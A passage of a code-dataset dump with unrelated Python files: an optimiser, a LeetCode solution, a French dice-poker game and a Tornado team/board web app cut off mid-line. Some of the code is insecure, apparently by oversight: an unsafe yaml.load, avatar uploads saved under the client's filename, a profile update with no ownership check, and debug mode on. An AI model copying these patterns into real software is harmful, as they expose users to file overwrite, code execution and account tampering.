(i + 1)))) + (\n 1 - Hessian_sampling_flag) * n\n sample_size_gradient = gradient_sampling_flag * int(\n min(n, max(n * initial_sample_size_gradient, n / n_iterations * (i + 1)))) + (\n 1 - gradient_sampling_flag) * n\n else:\n sample_size_Hessian = n\n sample_size_gradient = n\n\n ## b) draw batches ##\n ## take the batches.\n if sample_size_Hessian < n:\n int_idx_Hessian = np.random.randint(0, high=n, size=sample_size_Hessian)\n bool_idx_Hessian = np.zeros(n, dtype=bool)\n bool_idx_Hessian[int_idx_Hessian] = True\n _X = np.zeros((sample_size_Hessian, d))\n _X = np.compress(bool_idx_Hessian, X, axis=0)\n _Y = np.compress(bool_idx_Hessian, Y, axis=0)\n\n else:\n _X = X\n _Y = Y\n\n if sample_size_gradient < n:\n int_idx_gradient = np.random.randint(0, high=n, size=sample_size_gradient)\n bool_idx_gradient = np.zeros(n, dtype=bool)\n bool_idx_gradient[int_idx_gradient] = True\n _X2 = np.zeros((sample_size_gradient, d))\n _X2 = np.compress(bool_idx_gradient, X, axis=0)\n _Y2 = np.compress(bool_idx_gradient, Y, axis=0)\n\n else:\n _X2 = X\n _Y2 = Y\n\n n_samples_per_step = sample_size_Hessian + sample_size_gradient\n\n if gradient_sampling_flag==True:\n grad = gradient(w, _X2, _Y2, **kwargs)\n grad_norm = np.linalg.norm(grad)\n if grad_norm < grad_tol:\n break\n\n if Hessian_sampling_flag == True:\n hess = hessian(w, _X, _Y, **kwargs)\n\n ## do the line search\n delta_lb = 1e-1\n delta_ub = 5e-2\n ratio = 0.8\n linesearch_tol = 1e-3\n\n enable_linesearch = 0\n\n if enable_linesearch:\n (delta, s) = delta_linesearch(delta_lb, delta_ub, grad, hess, ratio, linesearch_tol) \n else:\n delta = 0.1\n grad_transpose = np.expand_dims(grad, axis=1)\n F = np.block([[hess, grad_transpose], [grad, -delta]])\n \n kk_start = datetime.now()\n # Compute the leftmost eigenvector of F\n _, eigenvector = eigsh(F, k=1, which='SA', tol='1e-5', return_eigenvectors=True)\n kk_timing = (datetime.now() - kk_start).total_seconds()\n print(kk_timing)\n eigenvector = eigenvector.reshape((F.shape[0], ))\n s = eigenvector[0:F.shape[0]-1] / eigenvector[-1]\n\n\n stepnorm = np.linalg.norm(s)\n\n\n previous_f = loss(w, X, Y, **kwargs)\n\n if np.dot(s, grad) > 0:\n s = -s\n\n beta = 0.8\n for kk in range(25):\n current_f = loss(w + (beta**kk) * s, X, Y, **kwargs)\n _loss = current_f\n function_decrease = previous_f - current_f\n if function_decrease > 0:\n w = w + (beta**kk) * s\n break\n\n print('----function decrease:----')\n print(function_decrease)\n\n n_samples_seen += n_samples_per_step\n\n\n _timing = timing\n timing = (datetime.now() - start).total_seconds()\n print('Iteration ' + str(i) + ': loss = ' + str(_loss) + ' norm_grad = ' + str(\n grad_norm), 'time= ', round(timing - _timing, 3), 'stepnorm=', stepnorm, 'Samples Hessian=',\n sample_size_Hessian, 'samples Gradient=', sample_size_gradient, 'delta=', delta, 'kk=', kk, \"\\n\")\n\n timings_collector.append(timing)\n samples_collector.append(n_samples_seen)\n loss_collector.append(_loss)\n\n k += 1\n\n return w, timings_collector, loss_collector, samples_collector\n\ndef delta_linesearch(delta_lb, delta_ub, grad, hess, ratio, linesearch_tol):\n\n grad_transpose = np.expand_dims(grad, axis=1)\n while (abs(delta_ub-delta_lb) > linesearch_tol):\n delta = (delta_ub+delta_lb) / 2\n F = np.block([[hess, grad_transpose],\n [grad, -delta]])\n eigenvalue, eigenvector = eigsh(F, k=1, which='SA', tol='1e-3', return_eigenvectors=True)\n eigenvector = eigenvector.reshape((F.shape[0], ))\n s = eigenvector[0:F.shape[0]-1] / eigenvector[-1]\n if np.linalg.norm(s) < ratio * (-eigenvalue):\n delta_lb = delta\n else:\n delta_ub = delta\n\n return delta, s\n\n\n\n\n\n\n","sub_path":"hsodm.py","file_name":"hsodm.py","file_ext":"py","file_size_in_byte":7350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212115061","text":"\"\"\"\nBeautiful Arrangement\nSuppose you have n integers from 1 to n. We define a beautiful arrangement as an array that is constructed by these n numbers successfully if one of the following is true for the ith position (1 <= i <= n) in this array:\n\nThe number at the ith position is divisible by i.\ni is divisible by the number at the ith position.\nGiven an integer n, return the number of the beautiful arrangements that you can construct.\n\n\n\nExample 1:\n\nInput: n = 2\nOutput: 2\nExplanation:\nThe first beautiful arrangement is [1, 2]:\nNumber at the 1st position (i=1) is 1, and 1 is divisible by i (i=1).\nNumber at the 2nd position (i=2) is 2, and 2 is divisible by i (i=2).\nThe second beautiful arrangement is [2, 1]:\nNumber at the 1st position (i=1) is 2, and 2 is divisible by i (i=1).\nNumber at the 2nd position (i=2) is 1, and i (i=2) is divisible by 1.\nExample 2:\n\nInput: n = 1\nOutput: 1\n\n\nConstraints:\n\n1 <= n <= 15\n\"\"\"\n\n\nclass Solution:\n dp = {}\n\n def countArrangement(self, n: int) -> int:\n # Solution 1 - 184 ms\n \"\"\"\n self.ans = 0\n nums = [x for x in range(1, n + 1)]\n\n def dfs(curr, nums, j):\n if len(curr) == n:\n self.ans += 1\n else:\n for i in range(len(nums)):\n if nums[i] % j == 0 or j % nums[i] == 0:\n dfs(curr + [nums[i]], nums[:i] + nums[i + 1:], j - 1)\n\n dfs([], nums, n)\n return self.ans\n \"\"\"\n # Solution 2 - 32 ms\n arr = tuple(range(1, n + 1))\n\n def dfs(arr):\n i = len(arr)\n if i == 1:\n return 1\n if arr in self.dp:\n return self.dp[arr]\n ans = 0\n for j, val in enumerate(arr):\n if val % i == 0 or i % val == 0:\n ans += dfs(arr[:j] + arr[j + 1:])\n self.dp[arr] = ans\n return ans\n\n return dfs(arr)\n\n\n# Main Call\nn = 2\nsolution = Solution()\nprint(solution.countArrangement(n))\n","sub_path":"src/integers/countArrangement.py","file_name":"countArrangement.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"574016911","text":"import yaml\n\nfrom joueur import Joueur\nfrom combinaison import Combinaison\nfrom random import shuffle\n\n\nclass Partie:\n \"\"\"Représente une partie du jeu de Poker d'As\n Attributes:\n joueurs (list): La liste des joueurs.\n \"\"\"\n\n def __init__(self, joueurs, interface):\n \"\"\"Initialise une partie avec la liste de joueurs\n Args:\n joueurs (list): La liste des joueurs.\n \"\"\"\n\n self.joueurs = joueurs\n self.interface = interface\n self.max_lancers = 3\n self.nb_tours = 0\n for joueur in joueurs:\n joueur.termine = False\n self.restore = False\n\n def restaure_partie(self):\n \"\"\"\n Permet de restaurer une partie qui a déjà été exécutée\n :return: aucun paramètre\n \"\"\"\n for i in range(0, len(self.ordre)):\n index = self.ordre[i]\n joueur = self.joueurs[index]\n self.update_interface_joueur(index,joueur)\n if joueur.termine == True:\n pass\n\n def update_interface_joueur(self,index,joueur):\n \"\"\"\n met à jour l'interface du joueur\n :param index: la position dans le tableau\n :param joueur: le joueur actif\n :return: aucun paramètre retourné\n \"\"\"\n self.interface.joueur_interface[index][0].config(text=joueur.nom)\n try:\n if joueur.est_joker == False:\n result = str(joueur.combinaison.determiner_type_combinaison_sans_joker())\n else:\n result = str(joueur.combinaison.determiner_type_combinaison())\n cbn =\"\"\n for i in joueur.combinaison.retourne_combinaison():\n cbn += i + \" \"\n try:\n pourcent = joueur.nb_victoires * 100 / joueur.nb_parties_jouees\n label = \"combinaison: \" + cbn + \"\\nresultat: \" + result + \"\\nnombre de parti gagnee: \" + str(joueur.nb_victoires) +\"\\nparti jouer: \" + str(joueur.nb_parties_jouees)+\"\\npourcentage: \" + str(round(pourcent,2)) + \" %\"\n except:\n label = \"combinaison: \" + cbn + \"\\nresultat: \" + result + \"\\nnombre de parti gagnee: \" + str(joueur.nb_victoires) + \"\\nparti jouer: \" + str(joueur.nb_parties_jouees)\n except AttributeError or IndexError:\n try:\n pourcent = joueur.nb_victoires * 100 / joueur.nb_parties_jouees\n label = \"combinaison: \\nresultat: \\nnombre de parti gagnee: \" + str(joueur.nb_victoires) +\"\\nparti jouer: \" + str(joueur.nb_parties_jouees)+\"\\npourcentage: \" + str(round(pourcent,2)) + \" %\"\n except:\n label = \"combinaison: \\nresultat: \\nnombre de parti gagnee: \" + str(joueur.nb_victoires) +\"\\nparti jouer: \" + str(joueur.nb_parties_jouees)\n\n self.interface.joueur_interface[index][1].config(text=label)\n\n def jouer_partie(self):\n \"\"\" Joue une partie entre tous les joueurs et détermine le gagnant.\n Le compteur du nombre de parties est incrémenté pour chacun des joueurs.\n Le compteur de victoires est incrémenté pour le joueur gagnant (si la partie n'est pas nulle).\n Le joueur gagnant est affiché à l'écran (ou un message indiquant que la partie est nulle, s'il y a lieu).\n \"\"\"\n if self.restore == False:\n self.ordre = self._determiner_ordre()\n\n for i in range(0, len(self.ordre)):\n index = self.ordre[i]\n\n self.joueur_actif = self.joueurs[self.ordre[i]]\n if self.restore == False:\n try:\n self.joueur_actif.combinaison = 1\n except AttributeError:\n pass\n self.update_interface_joueur(index, self.joueur_actif)\n\n self.max_lancers = 3\n resultats = []\n\n for i in range(0, len(self.ordre)):\n self.interface.sauvegarde.config(state=\"normal\")\n index = self.ordre[i]\n\n self.joueur_actif = self.joueurs[index]\n try:\n if type(self.joueur_actif.combinaison.des) != list:\n pass\n except AttributeError:\n self.joueur_actif.nb_parties_jouees += 1\n\n self.interface.tour_a.config(text=\"C'est au tour de {}\\n\".format(self.joueur_actif))\n self.update_interface_joueur(index, self.joueur_actif)\n\n\n resultat, self.nb_tours = self.joueur_actif.jouer_tour(self.max_lancers)\n if i == 0:\n self.max_lancers = self.nb_tours\n\n self.update_interface_joueur(index, self.joueur_actif)\n\n resultats.append((self.joueur_actif, resultat))\n\n meilleur_joueur, _ = Combinaison.determiner_meilleur_combinaison(resultats)\n if meilleur_joueur is None:\n self.interface.tour_a.config(text=\"La partie est nulle.\")\n else:\n self.interface.tour_a.config(text=\"{} a gagné\".format(meilleur_joueur))\n meilleur_joueur.nb_victoires += 1\n\n def _determiner_ordre(self):\n \"\"\"Détermine l'ordre dans lequel les joueurs vont jouer.\n Return (list): La liste des index des joueurs indiquant l'ordre.\n Exemple:\n [2, 1, 0] indique que joueur 3 joue, suivi du joueur 2, puis du\n joueur 1.\n \"\"\"\n ordre = list(range(0, len(self.joueurs)))\n shuffle(ordre)\n return ordre\n\n def sauvegarde(self):\n \"\"\"\n Sauvegarde les paramètres de la partie sous un fichier yaml.\n :return: aucun paramètre\n \"\"\"\n save = {}\n etat =0\n save[\"joueur\"] = {}\n for joueur in self.joueurs:\n save[\"joueur\"][joueur.nom] = {}\n save[\"joueur\"][joueur.nom]['emplacement'] = etat\n save[\"joueur\"][joueur.nom][\"parti_jouer\"] = joueur.nb_parties_jouees\n save[\"joueur\"][joueur.nom][\"nombre_victoire\"] = joueur.nb_victoires\n save[\"joueur\"][joueur.nom][\"est_joker\"] = joueur.est_joker\n try:\n save[\"joueur\"][joueur.nom][\"combinaison\"] = str(joueur.combinaison.des)\n save[\"joueur\"][joueur.nom][\"fin_tour\"] = joueur.termine\n save[\"joueur\"][joueur.nom][\"nombre de lancer\"] = joueur.combinaison.nb_lancers\n except AttributeError:\n save[\"joueur\"][joueur.nom][\"fin_tour\"] = False\n\n etat += 1\n save[\"partie\"] = {}\n save[\"partie\"][\"ordre\"] = self.ordre\n save[\"partie\"][\"limite\"] = self.max_lancers\n with open('save.yml', 'w') as yaml_file:\n yaml.dump(save, yaml_file, default_flow_style=False)\n #print(yaml.dump(save, default_flow_style=False ))\n\n def restaure(self):\n \"\"\"\n restaure le fichier yaml de parties et charge les paramètres dans la partie.\n :return: aucun paramètre\n \"\"\"\n with open(\"save.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\n joueurs_restaure = []\n for joueur in cfg['joueur']:\n joueurs_restaure.append(joueur)\n\n for joueur in cfg['joueur']:\n\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']] = Joueur(joueur,self.interface,cfg['joueur'][joueur]['est_joker'])\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].nb_parties_jouees = cfg['joueur'][joueur]['parti_jouer']\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].nb_victoires = cfg['joueur'][joueur]['nombre_victoire']\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].termine = cfg['joueur'][joueur]['fin_tour']\n\n try:\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].restaure_combinaison(cfg['joueur'][joueur]['combinaison'])\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].combinaison.nb_lancers = cfg['joueur'][joueur]['nombre de lancer']\n except KeyError:\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].nb_lancers = 0\n self.ordre = cfg[\"partie\"][\"ordre\"]\n self.max_lancers = cfg[\"partie\"][\"limite\"]\n self.joueurs = joueurs_restaure\n self.interface.list_obj_joueur = self.joueurs\n\n\nif __name__ == \"__main__\":\n joueurs = [Joueur(\"a\"), Joueur(\"b\"), Joueur(\"c\")]\n\n partie = Partie(joueurs)\n\n # Teste que tous les joueurs vont jouer une et une seule fois\n ordre = partie._determiner_ordre()\n assert len(ordre) == 3\n assert 0 in ordre\n assert 1 in ordre\n assert 2 in ordre\n\n partie.restaure()\n","sub_path":"partie.py","file_name":"partie.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548307739","text":"import tornado.web\nimport tornado.auth\nimport tornado.locks\nimport tornado.escape\nimport tornado.ioloop\nimport tornado\nimport datetime\nimport random\nimport pytz\nimport json\nimport os\n\nfrom abc import ABC\nfrom decouple import config\nfrom tornado.options import options, define\n\nfrom token_n import generate_confirmation_token, confirm_token\nfrom EmailSender import send_email\nfrom data import db_session\nfrom data.User import User, Notification\nfrom data.Team import Team\nfrom data.Boards import Boards, Message\nfrom data.Threads import Threads\nfrom data.User_events import UserEvents\nfrom data.Team_events import TeamEvents\n\nfrom forms.User import LoginForm, RegisterForm\nfrom forms.Team import TeamRegisterForm\nfrom forms.Boards import FormBoardsCreate\n\nfrom sqlalchemy.ext.declarative import DeclarativeMeta\n\n\nclass AlchemyEncoder(json.JSONEncoder):\n\tdef default(self, obj):\n\t\tif isinstance(obj.__class__, DeclarativeMeta):\n\t\t\t# an SQLAlchemy class\n\t\t\tfields = {}\n\t\t\tfor field in [x for x in dir(obj) if not x.startswith('_') and x != 'metadata']:\n\t\t\t\tdata = obj.__getattribute__(field)\n\t\t\t\ttry:\n\t\t\t\t\tjson.dumps(data) # this will fail on non-encodable values, like other classes\n\t\t\t\t\tfields[field] = data\n\t\t\t\texcept TypeError:\n\t\t\t\t\tfields[field] = None\n\t\t\t# a json-encodable dict\n\t\t\treturn fields\n\t\treturn json.JSONEncoder.default(self, obj)\n\n\ndefine(\"port\", default=int(os.environ.get(\"PORT\", 5000)), help=\"run on the given port\", type=int)\nCACHE_SIZE = 50 # Maximum number of messages on the board\n\n\nasync def append_to_team(user_invited: User, team: Team) -> None:\n\ttoken = generate_confirmation_token(user_invited.email)\n\tdb_sess = db_session.create_session()\n\tuser = db_sess.query(User).filter(team.chief == User.id).first()\n\tntf = Notification(\n\t\tname=f\"Invitation to join the team   {team.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user_invited.username}!\\n\" + f\"You were invited by {user.username} to the {team.title} team. \" + f\"If you want to accept the invitation, then follow this link\")\n\tuser_invited.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nasync def join_to_board(user_asked: User, board: Boards):\n\tdb_sess = db_session.create_session()\n\tuser_admin = db_sess.query(User).filter(board.admin == User.id).first()\n\ttoken = generate_confirmation_token(user_admin.email)\n\tntf = Notification(\n\t\tname=f\"Request to join the board   {board.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user_admin.username}!\\n\" + f\"You are asked by {user_asked.username} to add his (her) to your board {board.title}. \" + f\"If you want to do this, then follow this link\")\n\tuser_admin.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nasync def notify_join_team(user_invited: User, team: Team) -> None:\n\tdb_sess = db_session.create_session()\n\tuser = db_sess.query(User).filter(team.chief == User.id).first()\n\tntf = Notification(\n\t\tname=f\"Notification of joining the team   {team.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user.username}!\\n\" + f\"User {user_invited.username} has just accepted your application to join the team!\\n\" + \"Congratulations!\")\n\tuser.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nasync def notify_join_board(user_asked: User, board: Boards):\n\tdb_sess = db_session.create_session()\n\tntf = Notification(\n\t\tname=f\"Request to join the board   {board.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user_asked.username}!\\nYour request to join the board {board.title} has been accepted!\\nCongratulations!\")\n\tuser_asked.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nclass Application(tornado.web.Application):\n\tdef __init__(self, db=None):\n\t\tself.db = db\n\t\thandlers = [\n\t\t\t# Home page\n\t\t\t(r\"/\", HomeHandler),\n\t\t\t# For fun\n\t\t\t(r\"/generate_error/\\d\\d\\d\", ErrorGenerator),\n\t\t\t(r\"/chess$\", ChessHandler),\n\t\t\t(r\"/runner$\", RunnerHandler),\n\t\t\t(r\"/scrolling$\", ScrollingHandler),\n\t\t\t# Pages related to user invite\n\t\t\t(r\"/invite_team/\\S+\", InviteTeamHandler),\n\t\t\t(r\"/invite_board/\\S+\", InviteBoardHandler),\n\t\t\t# Pages related to the site policy\n\t\t\t(r\"/legal\", LegalHandler),\n\t\t\t(r\"/legal/cookie-policy\", LegalCookiePolicyHandler),\n\t\t\t# Pages related to user authorization\n\t\t\t(r\"/auth/create\", AuthCreateHandler),\n\t\t\t(r\"/auth/login\", AuthLoginHandler),\n\t\t\t(r\"/auth/logout\", AuthLogoutHandler),\n\t\t\t(r\"/auth/confirm\", AuthConfirmHandler),\n\t\t\t(r\"/auth/confirm/\\S+\", AuthCheckConfirmHandler),\n\t\t\t# Pages related to teams\n\t\t\t(r\"/teams\", TeamsHandler),\n\t\t\t(r\"/team/\\S+/edit$\", TeamEditHandler),\n\t\t\t(r\"/team/\\S+/leave$\", TeamLeaveHandler),\n\t\t\t# Pages related to boards\n\t\t\t(r\"/boards\", BoardsHandler),\n\t\t\t(r\"/board/\\S+/view$\", BoardViewHandler),\n\t\t\t(r\"/board/\\S+/edit$\", BoardEditHandler),\n\t\t\t(r\"/board/\\S+/leave$\", BoardLeaveHandler),\n\t\t\t(r\"/board/\\S+/delete$\", BoardDeleteHandler),\n\t\t\t(r\"/board/\\S+/user_event/new\", UserEventCreateHandler),\n\t\t\t(r\"/board/\\S+/team_event/new\", TeamEventCreateHandler),\n\t\t\t(r\"/board/\\S+/user_event/\\d+$\", UserEventHandler),\n\t\t\t(r\"/board/\\S+/team_event/\\d+$\", TeamEventHandler),\n\t\t\t(r\"/board/\\S+/user_event/edit/\\d+$\", UserEventEditHandler),\n\t\t\t(r\"/board/\\S+/team_event/edit/\\d+$\", TeamEventEditHandler),\n\t\t\t(r\"/board/\\S+/user_event/view/\\d+$\", UserEventAnswersView),\n\t\t\t(r\"/board/\\S+/team_event/view/\\d+$\", TeamEventAnswersView),\n\t\t\t(r\"/board/\\S+/flood$\", BoardFloodHandler),\n\t\t\t(r\"/board/\\S+/flood/new$\", MessageNewHandler),\n\t\t\t# Pages related to personal account (personal teams, boards, notifications, etc)\n\t\t\t(r\"/\\S+/inbox$\", UserInBoxHandler),\n\t\t\t(r\"/\\S+/inbox/check$\", UserInBoxCheckHandler),\n\t\t\t(r\"/\\S+/inbox/delete$\", UserInBoxDeleteHandler),\n\t\t\t(r\"/\\S+/teams$\", UserTeamsHandler),\n\t\t\t(r\"/\\S+/boards$\", UserBoardsHandler),\n\t\t\t(r\"/\\S+/create_team$\", CreateTeamHandler),\n\t\t\t(r\"/\\S+/create_board$\", CreateBoardHandler),\n\t\t\t(r\"/\\S+\", UserAccountHandler),\n\t\t]\n\t\tsettings = dict(\n\t\t\ttitle_=u\"Nabopalasar II\",\n\t\t\ttemplate_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n\t\t\tstatic_path=os.path.join(os.path.dirname(__file__), \"static\"),\n\t\t\t# ui_modules={\"Paginator\": PaginationHandler},\n\t\t\txsrf_cookies=True,\n\t\t\tcookie_secret=config(\"SECRET_KEY\"),\n\t\t\tlogin_url=\"/auth/login\",\n\t\t\tdebug=True,\n\t\t)\n\t\tsuper().__init__(handlers, **settings)\n\n\nclass BaseHandler(tornado.web.RequestHandler, ABC):\n\tasync def prepare(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser_email = tornado.escape.native_str(self.get_secure_cookie(\"user\"))\n\t\tif user_email:\n\t\t\tself.current_user = db_sess.query(User).filter(User.email == user_email).first()\n\n\t# Else cookies don't establish\n\n\tdef write_error(self, status_code: int, **kwargs):\n\t\tif status_code == 404:\n\t\t\tself.render(\"error404.html\")\n\t\telif status_code == 500:\n\t\t\tself.render(\"error500.html\")\n\t\telse:\n\t\t\tself.render(\"error_general.html\", status_code=status_code)\n\n\tdef check_match_user(self, user_: User) -> bool:\n\t\treturn True if self.current_user.id == user_.id else False\n\n\t@staticmethod\n\tdef get_user(username_: str, db_sess_) -> User:\n\t\treturn db_sess_.query(User).filter(User.username == username_).first()\n\n\t@staticmethod\n\tdef get_board(board_name: str, db_sess_) -> Boards:\n\t\treturn db_sess_.query(Boards).filter(Boards.title == board_name).first()\n\n\t@staticmethod\n\tdef get_team(team_name: str, db_sess_) -> Team:\n\t\treturn db_sess_.query(Team).filter(Team.title == team_name).first()\n\n\t@staticmethod\n\tdef get_team_event(event_id: str, db_sess_) -> TeamEvents:\n\t\treturn db_sess_.query(TeamEvents).filter(TeamEvents.id == int(event_id)).first()\n\n\t@staticmethod\n\tdef get_user_event(event_id: str, db_sess_) -> UserEvents:\n\t\treturn db_sess_.query(UserEvents).filter(UserEvents.id == int(event_id)).first()\n\n\t@staticmethod\n\tasync def get_dict_t(threads: list, board: Boards):\n\t\tdict_ts = {}\n\t\tfor t in threads:\n\t\t\tif t in board.board_threads:\n\t\t\t\tdict_ts[t] = True\n\t\t\telse:\n\t\t\t\tdict_ts[t] = False\n\t\treturn {key: value for key, value in sorted(dict_ts.items(), key=lambda item: item[1], reverse=True)}\n\n\nclass HomeHandler(BaseHandler, ABC):\n\t\"\"\"The home class that is primarily responsible for the navbar\"\"\"\n\n\tasync def get(self):\n\t\twith open('auto/news.json', mode='r', encoding='utf-8') as f:\n\t\t\tdata = json.load(f)\n\t\t# We don't want to not only lose, but also leave non-unique news\n\t\tawait self.render(\"base.html\", title=\"Home\", news_=data['news'])\n\n\nclass AuthLoginHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tform = LoginForm(self.request.arguments)\n\t\tawait self.render(\"auth_login.html\", title=\"Authorization\", message=None, form=form)\n\n\tasync def post(self):\n\t\tform = LoginForm(self.request.arguments)\n\t\tif form.validate():\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tuser = db_sess.query(User).filter(User.email == form.email.data).first()\n\t\t\tif user and user.check_password(form.password.data):\n\t\t\t\tself.set_secure_cookie(\"user\", self.get_argument(\"email\"))\n\t\t\t\tawait self.prepare()\n\t\t\t\tself.redirect(\"/\")\n\t\t\t\treturn\n\t\t\tawait self.render(\n\t\t\t\t\"auth_login.html\", title=\"Authorization error\",\n\t\t\t\tmessage=\"Incorrect username or password\", form=form\n\t\t\t)\n\t\tawait self.render(\"auth_login.html\", title=\"Authorization\", message=None, form=form)\n\n\nclass AuthCreateHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tform = RegisterForm(self.request.arguments)\n\t\tawait self.render(\n\t\t\t\"auth_create.html\", form=form, title=\"Sign Up\", message_username=None, message_email=None,\n\t\t\tmessage_password=None, )\n\n\tdef post(self):\n\t\tform = RegisterForm(self.request.arguments)\n\t\tif form.validate():\n\t\t\tif form.password.data != form.password_again.data:\n\t\t\t\treturn self.render(\n\t\t\t\t\t\"auth_create.html\", title=\"Password Error\", form=form, message_username=None,\n\t\t\t\t\tmessage_email=None, message_password=\"Passwords do not match\")\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tif db_sess.query(User).filter(User.email == form.email.data).first():\n\t\t\t\treturn self.render(\n\t\t\t\t\t\"auth_create.html\", title=\"Email Error\", form=form, message_email=f\"Email is already taken\",\n\t\t\t\t\tmessage_username=None, message_password=None)\n\t\t\tif self.get_user(form.username.data, db_sess):\n\t\t\t\treturn self.render(\n\t\t\t\t\t\"auth_create.html\", title=\"Username Error\", form=form,\n\t\t\t\t\tmessage_username=f\"Username {form.username.data} is not available\",\n\t\t\t\t\tmessage_password=None, message_email=None)\n\t\t\tuser = User(\n\t\t\t\tusername=form.username.data,\n\t\t\t\temail=form.email.data,\n\t\t\t\thashed_password=form.password_again.data,\n\t\t\t\tis_reads=False,\n\t\t\t\tis_confirmed=True # Heroku does not like my email posts (\n\t\t\t)\n\t\t\tuser.set_password(form.password.data)\n\t\t\tdb_sess.add(user)\n\t\t\tdb_sess.commit()\n\t\t\tself.set_secure_cookie(\"user\", str(form.email.data))\n\t\t\t# self.current_user = str(form.email.data)\n\t\t\t# The user immediately logs in; now you need to confirm your email address\n\t\t\t# self.redirect(\"/auth/confirm\")\n\t\t\tself.redirect(\"/\")\n\t\t\treturn\n\t\treturn self.render(\n\t\t\t\"auth_create.html\", form=form, title=\"Registration Error\", message_username=None,\n\t\t\tmessage_email=None, message_password=None)\n\n\nclass AuthLogoutHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tself.clear_cookie(\"user\")\n\t\tself.redirect(\"/\")\n\n\nclass AuthConfirmHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tif self.current_user.is_confirmed:\n\t\t\t# User already confirmed his email\n\t\t\tself.write_error(404)\n\t\ttoken = generate_confirmation_token(self.current_user.email)\n\t\ttext_msg = f\"Have a nice time of day, friend {self.current_user.username}!\\n\" \\\n\t\t f\"Babylon is so beautiful today only because you are on our website.\\n\" \\\n\t\t f\"However, to confirm your email address, you need to click on the following link:\\n\" \\\n\t\t f\"{self.request.uri}/{token}\\n\" \\\n\t\t f\"With best wishes,\\n\" \\\n\t\t f\"akkadian team Nabopalasar II\"\n\t\ttry:\n\t\t\t# if send_email(\n\t\t\t# \t\tself.current_user.email, \"Nabopalasar II: email confirmation\", text_msg,\n\t\t\t# \t\t\"../static/img/news/womans_img.jpg\"):\n\t\t\t# \tawait self.render(\"auth_confirm.html\", title=\"Confirm\", email=self.current_user.email, success=True)\n\t\t\t# \treturn\n\t\t\tpass\n\t\texcept Exception:\n\t\t\tawait self.render(\"auth_confirm.html\", title=\"Confirm\", email=self.current_user.email, success=False)\n\n\nclass AuthCheckConfirmHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tdef get(self):\n\t\tif self.current_user.is_confirmed:\n\t\t\t# User already confirmed his email\n\t\t\tself.write_error(404)\n\t\ttoken = self.request.uri.split(\"/\")[-1]\n\t\ttry:\n\t\t\temail = confirm_token(token)\n\t\texcept Exception:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tdb_sess = db_session.create_session()\n\t\tuser = db_sess.query(User).filter(User.email == email).first()\n\t\tif user.username != self.current_user.username:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tif user.is_confirmed:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tuser.is_confirmed = True\n\t\tdb_sess.add(user)\n\t\tdb_sess.commit()\n\t\tself.redirect(\"/\")\n\t\treturn\n\n\nclass UserAccountHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tusername = str(self.request.uri)[1:]\n\t\tif '/' in username:\n\t\t\t# It's another address\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(username, db_sess)\n\t\tif not user:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tteams_own = db_sess.query(Team).filter(Team.chief == self.current_user.id).all()\n\t\tboards_own = db_sess.query(Boards).filter(Boards.admin == self.current_user.id).all()\n\t\tawait self.render(\"user_view.html\", title=user.username, user=user, teams_own=teams_own, boards_own=boards_own)\n\n\t@tornado.web.authenticated\n\tdef post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(str(self.request.uri)[1:], db_sess)\n\t\tuser.name = self.get_body_argument(\"first_name\")\n\t\tuser.surname = self.get_body_argument(\"last_name\")\n\t\ttry:\n\t\t\t# If checkbox is deactivated then argument check_13 miss\n\t\t\t_ = self.get_body_argument(\"check_13\")\n\t\t\tuser.is_reads = True\n\t\texcept Exception:\n\t\t\tuser.is_reads = False\n\t\tf = self.request.files.get(\"avatar\")\n\t\tif f:\n\t\t\tfile_avatar = f[0] # We use only 1 file\n\t\t\tfilename = f\"static/img/users/{file_avatar['filename']}\"\n\t\t\twith open(filename, mode='wb') as 